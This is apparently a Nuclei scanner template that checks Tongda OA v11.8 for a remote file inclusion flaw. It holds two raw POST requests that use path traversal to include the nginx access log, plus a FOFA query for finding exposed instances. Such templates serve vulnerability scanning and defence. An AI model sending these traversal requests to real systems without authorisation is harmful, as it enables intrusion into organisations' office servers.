2023-09-07 07:06:21 +00:00
id : tongda-getway-rfi
info :
name : Tongda OA v11.8 getway.php - Remote File Inclution
author : SleepingBag945,pussycat0x
severity : critical
description : |
There is a file inclusion vulnerability in Tongda OA v11.8 getway.php, an attacker sends a malicious request to include a log file, resulting in an arbitrary file writing vulnerability
reference :
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E9%80%9A%E8%BE%BEOA%20v11.8%20getway.php%20%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E.md
metadata :
fofa-query : app="TDXK-通达OA"
2023-09-18 12:45:28 +00:00
max-request : 2
2023-09-07 07:06:21 +00:00
verified : true
tags : tongda,rfi
http :
- raw :
- |
POST /ispirit/interface/gateway.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Accept-Encoding : gzip
json={"url":"/general/../../nginx/logs/oa.access.log"}
- |
POST /mac/gateway.php HTTP/1.1
Host : {{Hostname}}
Content-Length : 54
Content-Type : application/x-www-form-urlencoded
Accept-Encoding : gzip
json={"url":"/general/../../nginx/logs/oa.access.log"}
matchers :
- type : dsl
dsl :
- 'contains(body_1, "ERROR URL")'
- "contains(body_2, 'GET') || contains(body_2, 'POST')"
- 'status_code_1==200 && status_code_2 == 200'
condition : and